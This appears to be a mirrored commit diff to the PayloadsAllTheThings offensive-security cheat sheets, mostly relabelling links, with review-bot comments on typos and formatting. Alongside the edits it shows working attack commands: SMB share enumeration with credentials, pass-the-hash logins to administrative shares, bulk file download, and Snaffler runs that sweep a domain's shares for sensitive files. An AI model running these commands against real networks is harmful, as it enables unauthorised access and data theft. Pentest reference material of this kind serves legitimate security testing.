mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
Remove deadlink
parent
1b037a9c64
commit
8df30de938
@ -848,7 +848,7 @@ Automated exploitation:
|
||||
|
||||
> Some shares can be accessible without authentication, explore them to find some juicy files
|
||||
|
||||
* [smbmap](https://github.com/ShawnDEvans/smbmap)
|
||||
* [ShawnDEvans/smbmap - a handy SMB enumeration tool](https://github.com/ShawnDEvans/smbmap)
|
||||
```powershell
|
||||
smbmap -H 10.10.10.10 # null session
|
||||
smbmap -H 10.10.10.10 -R # recursive listing
|
||||
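Review bot: The relabelled smbmap entry changes only the link text (the URL `https://github.com/ShawnDEvans/smbmap` is the same in both versions), which the commit subject "Remove deadlink" does not cover. Either mention the link-title cleanup in the commit message or split it into its own commit so the history of this file stays searchable.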
@ -856,7 +856,7 @@ Automated exploitation:
|
||||
smbmap -H 10.10.10.10 -d "DOMAIN.LOCAL" -u "USERNAME" -p "Password123*"
|
||||
```
|
||||
|
||||
* [pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
|
||||
* [byt3bl33d3r/pth-smbclient from path-toolkit](https://github.com/byt3bl33d3r/pth-toolkit)
|
||||
```powershell
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
|
||||
pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
|
||||
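Review bot: The new label `byt3bl33d3r/pth-smbclient from path-toolkit` still carries the `path-toolkit` typo, and its owner/repo prefix does not match the link target, which is `byt3bl33d3r/pth-toolkit`. Suggest `[byt3bl33d3r/pth-toolkit - pth-smbclient](https://github.com/byt3bl33d3r/pth-toolkit)` so the prefix matches the URL, as it does in the smbmap entry.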
@ -866,7 +866,7 @@ Automated exploitation:
|
||||
put # replace a file
|
||||
```
|
||||
|
||||
* [smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
|
||||
* [SecureAuthCorp/smbclient from Impacket](https://github.com/SecureAuthCorp/impacket)
|
||||
```powershell
|
||||
smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
|
||||
Sharename Type Comment
|
||||
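Review bot: `SecureAuthCorp/smbclient from Impacket` reads as an owner/repo pair, but the link points at `SecureAuthCorp/impacket`, so the label names a repository that the URL does not. Label it by the real repository and put the tool name in the description, for example `SecureAuthCorp/impacket - smbclient`.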
@ -896,6 +896,22 @@ Automated exploitation:
|
||||
smb: \> mget *
|
||||
```
|
||||
|
||||
|
||||
* [SnaffCon/Snaffler - a tool for pentesters to help find delicious candy](https://github.com/SnaffCon/Snaffler)
|
||||
```ps1
|
||||
snaffler.exe -s - snaffler.log
|
||||
|
||||
# Snaffle all the computers in the domain
|
||||
./Snaffler.exe -d domain.local -c <DC> -s
|
||||
|
||||
# Snaffle specific computers
|
||||
./Snaffler.exe -n computer1,computer2 -s
|
||||
|
||||
# Snaffle a specific directory
|
||||
./Snaffler.exe -i C:\ -s
|
||||
```
|
||||
|
||||
|
||||
### SCF and URL file attack against writeable share
|
||||
|
||||
Theses attacks can be automated with [Farmer.exe](https://github.com/mdsecactivebreach/Farmer) and [Crop.exe](https://github.com/mdsecactivebreach/Farmer/tree/main/crop)
|
||||
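Review bot: In the new Snaffler block, the first command `snaffler.exe -s - snaffler.log` has a bare `-` between `-s` and the file name, which looks like a dropped option letter (probably `-o` for the output file); please check it against the Snaffler README before merging. The block is also fenced as `ps1` while the neighbouring blocks use `powershell`, and it mixes `snaffler.exe` with `./Snaffler.exe`; pick one of each for consistency.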
@ -4032,3 +4048,4 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
|
||||
* [Diamond tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/diamond)
|
||||
* [A Diamond (Ticket) in the Ruff - By CHARLIE CLARK July 05, 2022](https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/)
|
||||
* [Sapphire tickets - The Hacker Recipes](https://www.thehacker.recipes/ad/movement/kerberos/forged-tickets/sapphire)
|
||||
* [Exploiting RBCD Using a Normal User Account - tiraniddo.dev - Friday, 13 May 2022](https://www.tiraniddo.dev/2022/05/exploiting-rbcd-using-normal-user.html)
|
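Review bot: The tiraniddo.dev entry writes its date as `Friday, 13 May 2022`, while the Semperis entry in the same list uses `July 05, 2022`. Use one date style across the reference list.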
@ -1085,7 +1085,6 @@ layout template:
|
||||
## References
|
||||
|
||||
* [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/)
|
||||
* [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/)
|
||||
* [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/)
|
||||
* [Gist - Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger)](https://gist.github.com/Yas3r/7006ec36ffb987cbfb98)
|
||||
* [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf)
|
||||
|
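Review bot: The reference dropped from this `## References` list (the hunk header goes from 7 lines to 6) is deleted outright, so the attribution is lost along with the link. If an archived copy exists, consider pointing the entry at it instead of removing it; failing that, name the removed URL in the commit message so it can be found later.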